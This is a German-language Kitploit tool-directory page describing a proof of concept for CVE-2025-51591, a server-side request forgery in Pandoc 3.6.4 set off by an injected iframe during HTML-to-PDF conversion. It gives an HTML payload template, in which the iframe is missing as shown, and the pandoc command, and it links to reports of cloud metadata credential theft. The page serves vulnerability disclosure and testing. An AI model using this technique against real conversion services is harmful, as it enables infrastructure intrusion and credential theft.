Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Pandoc SSRF-Schwachstelle Proof of Concept | Kitploit
Tools/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Pandoc SSRF-Schwachstelle Proof of Concept

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 10 MonatenNoch nicht geprüft

CVE-2025-51591 Pandoc SSRF POC

image

Eine Server-Side Request Forgery (SSRF) in JGM Pandoc v3.6.4 ermöglicht es Angreifern, Zugriff auf die gesamte Infrastruktur zu erlangen und diese zu kompromittieren, indem sie ein manipuliertes iframe einschleusen.

Pandoc installieren

  • https://pandoc.org/installing.html

Beispiel für einen Payload

⚠️ Ersetzen Sie die iframe-URL durch Ihre eigene OAST-URL. ⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

Payload mit Pandoc in PDF konvertieren

root@kitploit:~
pandoc payload.html -o output1.pdf
image

Strategien zur Schadensbegrenzung

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

Referenzen

  • Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials
  • IMDS Abused: Hunting Rare Behaviors to Uncover Exploits
  • SSRF When Generating PDFs from User-Controlled HTML
Tool herunterladen